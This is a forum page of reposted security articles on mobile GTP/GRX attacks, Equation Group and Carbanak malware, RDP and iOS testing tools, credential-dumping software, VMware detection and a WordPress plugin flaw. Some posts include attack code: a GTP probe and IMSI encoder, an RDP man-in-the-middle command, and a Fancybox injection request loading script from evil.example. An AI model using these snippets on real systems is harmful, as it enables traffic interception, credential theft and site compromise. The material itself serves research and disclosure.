Everything posted by Nytro

  1. The research: Mobile Internet traffic hijacking via GTP and GRX

Most users assume that access over a mobile network is safe because a big telecoms provider will protect its subscribers. Unfortunately, as practice shows, the mobile Internet is a great opportunity for an attacker. Positive Technologies experts have detected vulnerabilities in mobile network infrastructure that allow an attacker to intercept unencrypted GPRS traffic, spoof data, block Internet access, and determine a subscriber's location. Not only cell phones are exposed, but also special devices connected to 2G/3G/4G networks via modems: ATMs and payment terminals, remote transport and industrial equipment control systems, telemetry and monitoring tools, and so on.

Mobile operators usually encrypt GPRS traffic between the mobile terminal (smartphone or modem) and the Serving GPRS Support Node (SGSN) using the GEA-1/2/3 encryption algorithms, making it difficult to intercept and decrypt information. To bypass this restriction, an attacker can go after the operator's core network, where the data is not protected by authentication mechanisms. The routing (gateway) nodes, called GGSNs, are the weak point. The required nodes are easy to find with Shodan.io, the search engine for Internet-connected devices. Vulnerable nodes have open GTP ports, which allow an attacker to set up a connection and then encapsulate GTP control packets into the created tunnel. If the parameters are chosen correctly, the GGSN will treat them as packets from legitimate devices inside the operator's network.

The GTP protocol described above should never be reachable from the Internet. In practice, however, things are often quite different: there are more than 207,000 devices with open GTP ports across the global Internet, and more than five hundred of them are components of cellular network architecture that respond to a connection request.
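The scanning step described above can be sketched in a few lines. This example is mine, not Positive Technologies': a minimal GTPv1-C Echo Request, the packet a probe would send to UDP port 2123 (GTP-C) to check whether a host is a live GTP node. The field layout follows 3GPP TS 29.060; a node that is part of a GPRS core answers with an Echo Response.

```python
import struct

def gtp_echo_request(seq=1):
    """Build a GTPv1-C Echo Request (3GPP TS 29.060)."""
    flags = 0x32      # version 1, protocol type GTP, sequence number flag set
    msg_type = 0x01   # Echo Request
    teid = 0          # no tunnel established yet
    # the length field counts everything after the mandatory 8-byte header:
    # sequence number (2) + N-PDU number (1) + next extension header (1)
    length = 4
    return struct.pack("!BBHIHBB", flags, msg_type, length, teid, seq, 0, 0)

packet = gtp_echo_request()   # 12 bytes, ready to send over UDP to port 2123
```

Sending this to the five hundred responsive hosts mentioned above is what distinguishes real GTP endpoints from ports that merely happen to be open.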
Another benefit for attackers is that GTP is not the only protocol used to manage the detected hosts: FTP, SSH, web interfaces and so on are also used for management. An attacker can connect to a mobile operator's node by exploiting vulnerabilities (for example, default passwords) in these interfaces. An experimental search through Shodan reveals vulnerable devices, including some with Telnet open and password authentication disabled. An attacker could penetrate the network of an operator in the Central African Republic simply by connecting to one such device and applying the required settings. With access to the network of any one operator, the attacker automatically gains access to the GRX network and, through it, to other mobile operators. A single mistake by a single operator anywhere in the world creates this attack opportunity against many other mobile networks.

Among the various uses of a compromised boundary host, the following stand out: disconnecting subscribers from the Internet or blocking their access; connecting to the Internet with the credentials of a legitimate user, at someone else's expense; and sniffing a victim's traffic for phishing attacks. An attacker can also obtain a subscriber's ID (IMSI) and monitor the subscriber's location worldwide until the SIM card is changed. Let us describe some of these threats in more detail.

Internet at the expense of others. Goal: to drain the subscriber's account and use the connection for illegal purposes. Attack vector: the attacker operates from the GRX network or from an operator's network. Description: the attack is based on sending "Create PDP context request" packets containing the IMSI of a subscriber known in advance. The subscriber's credentials are thus used to establish the connection, and the unsuspecting subscriber receives a huge bill.
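For illustration (this helper is mine, not part of the original write-up): the IMSI travels inside the Create PDP Context Request in TBCD ("swapped nibble" BCD) form, per 3GPP TS 29.060 / TS 24.008. A short sketch of that encoding:

```python
def encode_imsi_tbcd(imsi: str) -> bytes:
    """Encode a decimal IMSI string as TBCD (swapped-nibble BCD).

    Digits are packed two per byte with the nibbles swapped; an
    odd-length IMSI is padded with the filler nibble 0xF.
    """
    digits = imsi + "F" if len(imsi) % 2 else imsi
    out = bytearray()
    for i in range(0, len(digits), 2):
        lo = int(digits[i], 16)       # first digit goes in the low nibble
        hi = int(digits[i + 1], 16)   # second digit in the high nibble
        out.append((hi << 4) | lo)
    return bytes(out)

# "12345" becomes 21 43 f5: note the swapped digit pairs and the 0xF filler
encoded = encode_imsi_tbcd("12345")
```

Knowing this layout is what lets an attacker substitute an arbitrary (even non-existent) IMSI into the request, as described next.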
It is even possible to establish a connection using the IMSI of a non-existent subscriber: subscriber authorization is performed at the SGSN stage, and the GGSN receives connections that are already verified. Since the SGSN is compromised, no verification is carried out. Result: an attacker can connect to the Internet with the credentials of a legitimate user.

Data interception. Goal: to sniff the victim's traffic and conduct phishing attacks. Attack vector: the attacker operates from the GRX network or from an operator's network. Description: an attacker can intercept data sent between the subscriber's device and the Internet by sending an "Update PDP Context Request" message with spoofed GSN addresses to the SGSN and GGSN. This attack is an analogue of ARP spoofing at the GTP level. Result: eavesdropping on or spoofing the victim's traffic, and disclosure of sensitive data.

DNS tunneling. Goal: to get unpaid Internet access from the subscriber's mobile station. Attack vector: the attacker is a subscriber of a mobile network, acting through a mobile phone. Description: this is a well-known attack vector, rooted in the dial-up days, that cheap and fast dedicated Internet access made largely obsolete. It can still be used in mobile networks, however: in roaming, for example, when mobile Internet prices are unreasonably high and transfer speed does not matter much (say, for checking email). The point of the attack is that some operators do not charge for DNS traffic, usually so they can redirect the subscriber to the operator's top-up page. An attacker can exploit this by sending specially crafted requests to the DNS server; a dedicated host on the Internet is needed to receive them. Result: unpaid Internet access at the mobile operator's expense.

Substitution of DNS for GGSN. Goal:
To sniff the victim's traffic and conduct phishing attacks. Attack vector: the attacker acts through the Internet. Description: if an attacker gains access to a GGSN (which, as we have seen, is quite possible), the DNS address can be replaced with the attacker's address, and all the subscriber's traffic will then be routed through the attacker's host. This makes it possible to listen to all of the subscriber's mobile traffic. Result: the ability to eavesdrop on or spoof the traffic of all subscribers and harvest confidential data for phishing attacks.

Some of these attacks cannot be performed if the equipment is configured properly, but the results of Positive Technologies' research suggest that misconfiguration is a common problem in the telecommunications sphere. Vendors often leave enabled services that should be disabled on this equipment, which gives attackers additional opportunities. Given the large number of nodes, it is recommended to automate configuration control using dedicated tools such as MaxPatrol.

How to Protect Yourself

The security measures required to resist such attacks include proper equipment configuration, firewalls at the GRX network edge, following the 3GPP TS 33.210 recommendations for security settings inside the PS Core network, security monitoring of the perimeter, and developing security compliance standards for the equipment together with regular compliance checks. Many people rely on new communication standards that include new security technologies. However, despite the development of such standards (3G, 4G), we cannot completely abandon older-generation (2G) networks. The reasons lie in the specifics of mobile network implementation: 2G base stations have better coverage, and 3G networks rely on their infrastructure.
LTE still uses the GTP protocol, so the protection measures above will remain relevant for the foreseeable future. The results of this research were gathered by Positive Technologies experts in 2013 and 2014 during security analysis consulting for several large mobile operators. For a detailed report on the vulnerabilities of mobile Internet (GPRS), please visit the Positive Technologies official site: www.ptsecurity.com/download/Vulnerabilities_of_Mobile_Internet.pdf Posted by Positive Research at 12:54 AM Sursa: http://blog.ptsecurity.com/2015/02/the-research-mobile-internet-traffic.html
  2. VULNERABILITIES OF MOBILE INTERNET (GPRS)

Dmitry Kurbatov, Sergey Puzankov, Pavel Novikov, 2014

Contents:
1. Introduction
2. Summary
3. Mobile network scheme
4. GTP protocol
5. Searching for mobile operator's facilities on the Internet
6. Threats
6.1. IMSI brute force
6.2. The disclosure of subscriber's data via IMSI
6.3. Disconnection of authorized subscribers from the Internet
6.4. Blocking the connection to the Internet
6.5. Internet at the expense of others
6.6. Data interception
6.7. DNS tunneling
6.8. Substitution of DNS for GGSN
7. Conclusion and recommendations

Download: http://www.ptsecurity.com/download/Vulnerabilities_of_Mobile_Internet.pdf
  3. iSpy Assessment Framework

iSpy aims to be your one-stop shop for reverse engineering and dynamic analysis of iOS applications.

Current Release: the current release is a developer preview; the code is subject to change and will be unstable. However, we appreciate code contributions, feature requests, and bug reports. We currently do not have binary releases; stay tuned!

Instructions: Compiling and Installing iSpy; Injecting iSpy into Apps.

Features:
  • Easy-to-use web GUI
  • Class dumps
  • Instance tracking
  • Automatic jailbreak-detection bypasses
  • Automatic SSL certificate pinning bypasses
  • Re-implemented objc_msgSend for logging and tracing function calls in real time
  • Cycript integration; access Cycript from your browser!
  • Anti-anti-method-swizzling
  • Automatic detection of vulnerable function calls
  • Easy-to-use soft breakpoints
  • More on the way!

Sursa: https://github.com/BishopFox/iSpy
  4. Big-brand hard disk firmware worldwide RIDDLED with NSA SPY KIT

Kaspersky: 'Equation Group' attacked 'high value targets'

17 Feb 2015 at 01:57, Darren Pauli

America's National Security Agency (NSA) has infected hard disk firmware with spyware in a campaign valued as highly as Stuxnet and dating back at least 14 years, and possibly up to two decades, according to an analysis by Kaspersky Lab and subsequent reports. The campaign infected possibly tens of thousands of computers in telecommunications providers, governments, militaries, utilities, and mass media organisations, among others, in more than 30 countries. The agency is said to have compromised hard drive firmware from more than a dozen top brands, including Seagate, Western Digital, IBM, Toshiba, Samsung and Maxtor, Kaspersky researchers revealed. Reuters reports that sources formerly working with the NSA confirmed the agency was responsible for the attacks, an attribution Kaspersky itself stops short of making.

Kaspersky's analysis says the NSA made a breakthrough by infecting hard disk firmware with malware, known only as nls_933w.dll, capable of persisting across machine wipes to re-infect targeted systems. Researchers said the actors, dubbed 'The Equation Group', had access to the firmware source code and exercised their full remote-access control over infected machines only for high-value targets. "The Equation group is probably one of the most sophisticated cyber attack groups in the world," Kaspersky bods said in an advisory. "This is an astonishing technical accomplishment and is testament to the group's abilities." "For many years they have interacted with other powerful groups, such as the Stuxnet and Flame groups; always from a position of superiority, as they had access to exploits earlier than the others." It called the campaign the "Death Star" of the malware universe, and said (PDF) the Equation moniker was given based on the attackers' "love for encryption algorithms and obfuscation strategies".
Reuters sources at the NSA said the agency would sometimes pose as software developers to trick manufacturers into supplying source code, or would simply keep a copy of the data when it performed official code audits on behalf of the Pentagon. Western Digital said it did not share source code with the agency; it is unknown whether the other named hard drive manufacturers did so.

Vectors

The agency spread its spy tools through compromised jihadist watering-hole sites and by intercepting and infecting removable media, including CDs. The latter vector was discovered in 2009, when a scientist named Grzegorz Brzeczyszczykiewicz received a CD sent by an unnamed prestigious international scientific conference he had just attended in Houston. Kaspersky said that CD contained three exploits, two of them zero-days, sent by the "almost omnipotent" attack group. Another method involved custom malware dubbed Fanny, which used two zero-day flaws identical to ones later executed in Stuxnet. Its main purpose, Kaspersky's researchers said, was to map air-gapped networks using a unique USB-based command-and-control mechanism that could pass data back and forth across the air gap. This, the researchers said, indicated that the authors worked in collaboration with those behind the Natanz uranium plant weapon, and further shored up claims that the NSA was behind the attacks. Other trojans used in the prolonged and widespread attacks were dubbed EquationLaser, EquationDrug, DoubleFantasy, TripleFantasy, and GrayFish. Kaspersky detailed the trojans in a document:

EQUATIONDRUG: a very complex attack platform used by the group on its victims. It supports a module plugin system, which can be dynamically uploaded and unloaded by the attackers.

DOUBLEFANTASY: a validator-style trojan, designed to confirm the target is the intended one. If the target is confirmed, it gets upgraded to a more sophisticated platform such as EQUATIONDRUG or GRAYFISH.

EQUESTRE: same as EQUATIONDRUG.
TRIPLEFANTASY: a full-featured backdoor sometimes used in tandem with GRAYFISH. Looks like an upgrade of DOUBLEFANTASY, and is possibly a more recent validator-style plugin.

GRAYFISH: the most sophisticated attack platform from the Equation Group. It resides completely in the registry, relying on a bootkit to gain execution at OS startup.

FANNY: a computer worm created in 2008 and used to gather information about targets in the Middle East and Asia. Some victims appear to have been upgraded first to DOUBLEFANTASY, and then to the EQUATIONDRUG system. Fanny used exploits for two zero-day vulnerabilities which were later discovered in Stuxnet.

EQUATIONLASER: an early implant from the Equation Group, used around 2001-2004. Compatible with Windows 95/98, and created sometime between DOUBLEFANTASY and EQUATIONDRUG.

Kaspersky has included indicators of compromise for the malware strains and will publish an update in the coming days, it said. ®

Sursa: http://www.theregister.co.uk/2015/02/17/kaspersky_labs_equation_group/
  5. CARBANAK APT: THE GREAT BANK ROBBERY

By Kaspersky

Table of contents:
1. Executive Summary
2. Analysis
2.1 Infection and Transmission
2.2 Malware Analysis – Backdoor.Win32.Carbanak
2.3 Lateral movement tools
2.4 Command and Control (C2) Servers
3. Conclusions
APPENDIX 1: C2 protocol decoders
APPENDIX 2: BAT file to detect infection
APPENDIX 3: IOC hosts
APPENDIX 4: Spear phishing
APPENDIX 5: MD5 hashes of Carbanak samples

Download: https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
  6. RDPY: Remote Desktop Protocol in twisted python

RDPY is a pure Python implementation of the Microsoft RDP (Remote Desktop Protocol) protocol, client and server side, built on the event-driven network engine Twisted. RDPY provides the following RDP and VNC binaries:
  • RDP man-in-the-middle proxy that records sessions
  • RDP honeypot
  • RDP screenshoter
  • RDP client
  • VNC client
  • VNC screenshoter
  • RSS player

Build

RDPY is fully implemented in Python, except for the bitmap decompression algorithm, which is implemented in C for performance reasons.

Dependencies are only needed for the PyQt4 binaries (rdpy-rdpclient, rdpy-rdpscreenshot, rdpy-vncclient, rdpy-vncscreenshot, rdpy-rssplayer):
  • Linux (Debian-based systems): sudo apt-get install python-qt4
  • Windows: PyQt4 and PyWin32 (available for both x86 and x86_64)

Build from source:
$ git clone https://github.com/citronneur/rdpy.git rdpy
$ pip install twisted pyopenssl qt4reactor service_identity rsa
$ python rdpy/setup.py install

Or use pip:
$ pip install rdpy

For a virtualenv, you will need to link the Qt4 libraries into it:
$ ln -s /usr/lib/python2.7/dist-packages/PyQt4/ $VIRTUAL_ENV/lib/python2.7/site-packages/
$ ln -s /usr/lib/python2.7/dist-packages/sip.so $VIRTUAL_ENV/lib/python2.7/site-packages/

RDPY Binaries

RDPY comes with some very useful binaries, compatible with both Linux and Windows.

rdpy-rdpclient: a simple RDP Qt4 client.
$ rdpy-rdpclient.py [-u username] [-p password] [-d domain] [-r rss_output_file] [...] XXX.XXX.XXX.XXX[:3389]
You can use rdpy-rdpclient to record a session scenario for use with rdpy-rdphoneypot.

rdpy-vncclient: a simple VNC Qt4 client.
$ rdpy-vncclient.py [-p password] XXX.XXX.XXX.XXX[:5900]

rdpy-rdpscreenshot: saves the login screen to a file.
$ rdpy-rdpscreenshot.py [-w width] [-l height] [-o output_file_path] XXX.XXX.XXX.XXX[:3389]

rdpy-vncscreenshot: saves the first screen update to a file.
$ rdpy-vncscreenshot.py [-p password] [-o output_file_path] XXX.XXX.XXX.XXX[:5900]

rdpy-rdpmitm: an RDP proxy that lets you run a man-in-the-middle attack on the RDP protocol, recording each session into an rss file that can be replayed by rdpy-rssplayer.
$ rdpy-rdpmitm.py -o output_dir [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] [-r (for XP or Server 2003 clients)] target_host[:target_port]
The output directory is used to save the rss files, named YYYYMMDDHHMMSS_ip_index.rss. The private key and certificate files are standard cryptographic files for SSL connections; the RDP protocol can negotiate its own security layer, and if either parameter is omitted the server uses standard RDP security. The CredSSP security layer is planned for an upcoming release.

rdpy-rdphoneypot: an RDP honeypot that replays recorded session scenarios over the RDP protocol.
$ rdpy-rdphoneypot.py [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] rss_file_path_1 ... rss_file_path_N
The private key and certificate files work as for rdpy-rdpmitm. You can specify more than one rss file to match more common screen sizes.

rdpy-rssplayer: replays Record Session Scenario (rss) files generated by either rdpy-rdpmitm or rdpy-rdpclient.
$ rdpy-rssplayer.py rss_file_path

RDPY Qt Widget

RDPY can also be used as a Qt widget, through the rdpy.ui.qt4.QRemoteDesktop class, and embedded in your own Qt application.
qt4reactor must be used in your app for Twisted and Qt to work together. For more details, see the sources of rdpy-rdpclient.

RDPY library

In a nutshell, RDPY can be used as a protocol library with a Twisted engine.

Simple RDP Client

```python
from rdpy.protocol.rdp import rdp
from twisted.internet import reactor

class MyRDPFactory(rdp.ClientFactory):

    def clientConnectionLost(self, connector, reason):
        reactor.stop()

    def clientConnectionFailed(self, connector, reason):
        reactor.stop()

    def buildObserver(self, controller, addr):
        class MyObserver(rdp.RDPClientObserver):
            def onReady(self):
                """Called when the stack is ready."""
                # send the 'r' key
                self._controller.sendKeyEventUnicode(ord("r"), True)
                # mouse move and click at pixel (200, 200)
                self._controller.sendPointerEvent(200, 200, 1, True)

            def onUpdate(self, destLeft, destTop, destRight, destBottom,
                         width, height, bitsPerPixel, isCompress, data):
                """Called on each bitmap update.
                destLeft/destTop are the xmin/ymin position; destRight/destBottom
                are xmax/ymax, because RDP can send bitmaps with padding;
                isCompress indicates RLE compression."""

            def onClose(self):
                """Called when the stack is closed."""

        return MyObserver(controller)

reactor.connectTCP("XXX.XXX.XXX.XXX", 3389, MyRDPFactory())
reactor.run()
```

Simple RDP Server

```python
from rdpy.protocol.rdp import rdp
from twisted.internet import reactor

class MyRDPFactory(rdp.ServerFactory):

    def buildObserver(self, controller, addr):
        class MyObserver(rdp.RDPServerObserver):
            def onReady(self):
                """Called when the server is ready to send and receive messages."""

            def onKeyEventScancode(self, code, isPressed):
                """Keyboard event in scan-code format.
                code: scan code of the key; isPressed: True if the key is down."""

            def onKeyEventUnicode(self, code, isPressed):
                """Keyboard event in unicode format.
                code: unicode of the key; isPressed: True if the key is down."""

            def onPointerEvent(self, x, y, button, isPressed):
                """Mouse event at (x, y).
                button: 1, 2 or 3; isPressed: True if the button is pressed."""

            def onClose(self):
                """Called when the human client closes the connection."""

        return MyObserver(controller)

reactor.listenTCP(3389, MyRDPFactory())
reactor.run()
```

Simple VNC Client

```python
from rdpy.protocol.rfb import rfb
from twisted.internet import reactor

class MyRFBFactory(rfb.ClientFactory):

    def clientConnectionLost(self, connector, reason):
        reactor.stop()

    def clientConnectionFailed(self, connector, reason):
        reactor.stop()

    def buildObserver(self, controller, addr):
        class MyObserver(rfb.RFBClientObserver):
            def onReady(self):
                """Called when the network stack is ready to send or receive events."""

            def onUpdate(self, width, height, x, y, pixelFormat, encoding, data):
                """New image data of the given size at (x, y).
                pixelFormat is an rfb.message.PixelFormat structure;
                encoding is an rfb.message.Encoding type; data is the image
                data in accordance with the pixel format and encoding."""

            def onCutText(self, text):
                """Server sent a cut-text event."""

            def onBell(self):
                """Server sent a bell."""

            def onClose(self):
                """Called when the stack is closed."""

        return MyObserver(controller)

reactor.connectTCP("XXX.XXX.XXX.XXX", 5900, MyRFBFactory())
reactor.run()
```

Sursa: https://github.com/citronneur/rdpy
  7. Windows Credentials Editor (WCE): List, Add & Change Logon Sessions

Windows Credentials Editor (WCE) is a security tool to list logon sessions and add, change, list and delete their associated credentials (e.g. LM/NT hashes, plaintext passwords and Kerberos tickets). It can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.), obtain Kerberos tickets and reuse them on other Windows or Unix systems, and dump cleartext passwords entered by users at logon. WCE is widely used by security professionals to assess the security of Windows networks via penetration testing. It supports Windows XP, 2003, Vista, 7, 2008 and Windows 8.

Features:
  • Perform pass-the-hash on Windows
  • 'Steal' NTLM credentials from memory (with and without code injection)
  • 'Steal' Kerberos tickets from Windows machines
  • Reuse the 'stolen' Kerberos tickets on other Windows or Unix machines to gain access to systems and services
  • Dump cleartext passwords stored by Windows authentication packages

WCE is aimed at security professionals and penetration testers. It is essentially a post-exploitation tool to 'steal' and reuse NTLM hashes, Kerberos tickets and plaintext passwords, which can then be used to compromise other machines. Under certain circumstances, WCE can allow you to compromise the whole Windows domain after compromising only one server or workstation.

You can download WCE here: WCE v1.42beta (32-bit), WCE v1.42beta (64-bit). Or read more here.

Sursa: http://www.darknet.org.uk/2015/02/windows-credentials-editor-wce-list-add-change-logon-sessions/
  8. VMware Detection

Ladies and gentlemen, I give you yet another case of VMware detection. Unfortunately, this one only works for VMware. A friend of mine, one Aaron Yool, told me of a way to detect VMware via the use of privileged instructions, specifically the "IN" instruction, which is used for reading values from I/O ports. What the heck is that? According to the IA-32 manual:

I/O ports are created in system hardware by circuitry that decodes the control, data, and address pins on the processor. These I/O ports are then configured to communicate with peripheral devices. An I/O port can be an input port, an output port, or a bidirectional port. Some I/O ports are used for transmitting data, such as to and from the transmit and receive registers, respectively, of a serial interface device. Other I/O ports are used to control peripheral devices, such as the control registers of a disk controller.

Dry material, huh? That's the Intel manual for you. Normally you can't execute this instruction on Windows in user mode: it's a system instruction, like HLT, reserved for ring 0. On VMware, however, you can call it from ring 3. What could be done if a user-mode program could run system-level instructions? The sky is the limit, but think rootkit without admin. Pretty wicked stuff. Is that the case here? No, not yet anyway. For now, we have a simple way of checking whether we're inside VMware, PoC included. We're using SEH (Structured Exception Handling) in case Windows complains about the instruction being privileged. Who here likes code? I do!

```cpp
// ----------------------------------------------------------------------------
// THE BEER-WARE LICENSE (Revision 43):
// <aaronryool@gmail.com> wrote this file. As long as you retain this notice you
// can do whatever you want with this stuff. If we meet some day, and you think
// this stuff is worth it, you can buy me a beer in return
// ----------------------------------------------------------------------------
#include <iostream>
#include <tchar.h>
#include <windows.h>

unsigned vmware(void)
{
    __asm{
        mov eax, 0x564d5868  // 'VMXh' backdoor magic number
        mov cl, 0xa          // backdoor command: get VMware version
        mov dx, 0x5658       // 'VX' backdoor I/O port
        in eax, dx           // privileged on bare metal, allowed under VMware
        cmp ebx, 0
        jne matrix
        xor eax, eax
        ret
    matrix:
        mov eax, 1
    };
}

int seh_filter(unsigned code, struct _EXCEPTION_POINTERS* ep)
{
    return EXCEPTION_EXECUTE_HANDLER;
}

int _tmain(int a, _TCHAR* argv[])
{
    __try
    {
        if(vmware())
            goto matrix;
    }
    __except(seh_filter(GetExceptionCode(), GetExceptionInformation()))
    {
        goto stage2;
    }
stage2:
    std::cout << "Isn't real life boring?" << std::endl;
    exit(0);
matrix:
    std::cout << "The Matrix haz you Neo..." << std::endl;
    exit(1);
}
```

Happy hacking!

Sursa: Vmware Detection « Joe's Security Blog
  9. Analysis of the Fancybox-For-WordPress Vulnerability

By Marc-Alexandre Montpas on February 16, 2015

We were alerted last week to a malware outbreak affecting WordPress sites using version 3.0.2 and lower of the fancybox-for-wordpress plugin. As announced, here are some of the details explaining how attackers could use this vulnerability to inject malicious iframes on websites using this plugin.

Technical details

This vulnerability exploits a somewhat well-known attack vector among WordPress plugins: unprotected "admin_init" hooks. Because "admin_init" hooks can be called by anyone visiting either /wp-admin/admin-post.php or /wp-admin/admin-ajax.php, remote attackers could use the hook to change the plugin's "mfbfw" option to any desired content. That got us asking: what is this option used for? We found it used in many places within the plugin's codebase. The one that caught our attention was inside the mfbfw_init() function, which outputs jQuery scripts configured with the parameters set up earlier in mfbfw_admin_options(). The $settings array is not sanitized before being output to the client, which means an attacker, using the unprotected "admin_init" hook, could inject malicious JavaScript payloads into every page of a vulnerable website, such as the "203koko" iframe injection we presented last week.

Sursa: http://blog.sucuri.net/2015/02/analysis-of-the-fancybox-for-wordpress-vulnerability.html
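To make the attack surface concrete, here is a hedged sketch (mine, not Sucuri's) of how such an unauthenticated request could be assembled. The "page" parameter and the "mfbfw[...]" field name are illustrative assumptions about the settings-form layout, not the exact names the real exploit used; the key point is only that /wp-admin/admin-post.php runs "admin_init" hooks for any visitor, no login required.

```python
from urllib.parse import urlencode

def build_admin_init_request(target, settings):
    """Build an unauthenticated POST aimed at /wp-admin/admin-post.php.

    Any visitor reaches "admin_init" hooks through this endpoint, so a
    plugin that saves its options inside such a hook, without a capability
    or nonce check, will accept a request like this one.
    """
    url = target.rstrip("/") + "/wp-admin/admin-post.php"
    # "page" selects the (assumed) plugin settings handler; the remaining
    # fields become the "mfbfw" option the vulnerable code stores verbatim.
    body = urlencode({"page": "fancybox-for-wordpress", **settings})
    return url, body

url, body = build_admin_init_request(
    "http://victim.example",
    {"mfbfw[extraCalls]": "<script src=//evil.example/x.js></script>"},
)
```

Because mfbfw_init() later echoes these settings unsanitized into every page, whatever lands in the option becomes stored JavaScript injection.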
  10. Memex: DARPA's search engine for the Dark Web

by Mark Stockley on February 16, 2015

Anyone who used the World Wide Web in the nineties will know that web search has come a long way. Sure, it was easy to get more search results than you knew what to do with in 1999, but it was really hard to get good ones. What Google did better than AltaVista, HotBot, Yahoo and the others at the dawn of the millennium was figure out which search results were the most relevant and respected. And so it's been ever since: search engines have become fast, simple interfaces that compete on relevance and earn money from advertising. Meanwhile, the methods for finding things to put in the search results have remained largely the same: you either tell the search engines your site exists or they find it by following a link on somebody else's website. That business model has worked extremely well, but there's one thing it does not excel at: depth. If you don't declare your site's existence and nobody links to it, it doesn't exist, in search-engine land at least. Google's stated aim may be to organize the world's information and make it universally accessible and useful, but it hasn't succeeded yet. That's not just because it's difficult; it's also because Google is a business, and there isn't a strong commercial imperative for it to index everything. Estimates of how much of the web has been indexed vary wildly (I've seen figures of 0.04% and 76%, so we can perhaps narrow it down to somewhere between almost none and almost all), but one thing is sure: there's enough stuff that hasn't been indexed that it's got its own name, the Deep Web. It's not out of the question to suggest that the part of the web that hasn't been indexed is actually bigger than the part that has. A subset of it, the part hosted on Tor Hidden Services and referred to as the Dark Web, is very interesting to those in law enforcement.
There are all manner of people, sites and services that operate over the web that would rather not appear in your Google search results. If you're a terrorist, paedophile, gun-runner, drug dealer, sex trafficker or serious criminal of that ilk then the shadows of the Deep Web, and particularly the Dark Web, offer a safer haven than the part occupied by, say, Naked Security or Wikipedia. Enter Memex, brainchild of the boffins at DARPA, the US government agency that built the internet (then ARPANET). DARPA describes Memex as a set of search tools that are better suited to government (presumably law enforcement and intelligence) use than commercial search engines. Whereas Google and Bing are designed to be good-enough systems that work for everyone, Memex will end up powering domain-specific searches that are the very best solution for specific narrow interests (such as certain types of crime). Today's web searches use a centralized, one-size-fits-all approach that searches the internet with the same set of tools for all queries. While that model has been wildly successful commercially, it does not work well for many government use cases. The goal is for users to ... quickly and thoroughly organize subsets of information based on individual interests ... and to improve the ability of military, government and commercial enterprises to find and organize mission-critical publically [sic] available information on the internet. Although Memex will eventually have a very broad range of applications, the project's initial focus is on tackling human trafficking and slavery. According to DARPA, human trafficking has a significant Dark Web presence in the form of forums, advertisements, job postings and hidden services (anonymous sites available via Tor). Memex has been available to a few law enforcement agencies for about a year and has already been used with some success. 
In September 2014, sex trafficker Benjamin Gaston was sentenced to a minimum of 50 years in prison having been found guilty of "Sex Trafficking, as well as Kidnapping, Criminal Sexual Act, Rape, Assault, and Sex Abuse - all in the First Degree". Scientific American reports that Memex was in the thick of it: A key weapon in the prosecutor's arsenal, according to the NYDA's Office: an experimental set of internet search tools the US Department of Defense is developing to help catch and lock up human traffickers. The journal also reports that Memex is used by the New York County District Attorney's Office in every case pursued by its Human Trafficking Response Unit, and it has played a role in generating at least 20 active sex trafficking investigations. If Memex carries on like this then we'll have to think of a new name for the Dark Web. Sursa: https://nakedsecurity.sophos.com/2015/02/16/memex-darpas-search-engine-for-the-dark-web/
  11. Russian researchers expose breakthrough U.S. spying program BY JOSEPH MENN SAN FRANCISCO Mon Feb 16, 2015 5:10pm EST (Reuters) - The U.S. National Security Agency has figured out how to hide spying software deep within hard drives made by Western Digital, Seagate, Toshiba and other top manufacturers, giving the agency the means to eavesdrop on the majority of the world's computers, according to cyber researchers and former operatives. That long-sought and closely guarded ability was part of a cluster of spying programs discovered by Kaspersky Lab, the Moscow-based security software maker that has exposed a series of Western cyberespionage operations. Kaspersky said it found personal computers in 30 countries infected with one or more of the spying programs, with the most infections seen in Iran, followed by Russia, Pakistan, Afghanistan, China, Mali, Syria, Yemen and Algeria. The targets included government and military institutions, telecommunication companies, banks, energy companies, nuclear researchers, media, and Islamic activists, Kaspersky said. (reut.rs/1L5knm0) The firm declined to publicly name the country behind the spying campaign, but said it was closely linked to Stuxnet, the NSA-led cyberweapon that was used to attack Iran's uranium enrichment facility. The NSA is the agency responsible for gathering electronic intelligence on behalf of the United States. A former NSA employee told Reuters that Kaspersky's analysis was correct, and that people still in the intelligence agency valued these spying programs as highly as Stuxnet. Another former intelligence operative confirmed that the NSA had developed the prized technique of concealing spyware in hard drives, but said he did not know which spy efforts relied on it. NSA spokeswoman Vanee Vines declined to comment. Kaspersky published the technical details of its research on Monday, which should help infected institutions detect the spying programs, some of which trace back as far as 2001. 
The disclosure could further hurt the NSA's surveillance abilities, already damaged by massive leaks by former contractor Edward Snowden. Snowden's revelations have hurt the United States' relations with some allies and slowed the sales of U.S. technology products abroad. The exposure of these new spying tools could lead to greater backlash against Western technology, particularly in countries such as China, which is already drafting regulations that would require most bank technology suppliers to proffer copies of their software code for inspection. Peter Swire, one of five members of U.S. President Barack Obama's Review Group on Intelligence and Communications Technology, said the Kaspersky report showed that it is essential for the country to consider the possible impact on trade and diplomatic relations before deciding to use its knowledge of software flaws for intelligence gathering. "There can be serious negative effects on other U.S. interests," Swire said. TECHNOLOGICAL BREAKTHROUGH According to Kaspersky, the spies made a technological breakthrough by figuring out how to lodge malicious software in the obscure code called firmware that launches every time a computer is turned on. Disk drive firmware is viewed by spies and cybersecurity experts as the second-most valuable real estate on a PC for a hacker, second only to the BIOS code invoked automatically as a computer boots up. "The hardware will be able to infect the computer over and over," lead Kaspersky researcher Costin Raiu said in an interview. Though the leaders of the still-active espionage campaign could have taken control of thousands of PCs, giving them the ability to steal files or eavesdrop on anything they wanted, the spies were selective and only established full remote control over machines belonging to the most desirable foreign targets, according to Raiu. He said Kaspersky found only a few especially high-value computers with the hard-drive infections. 
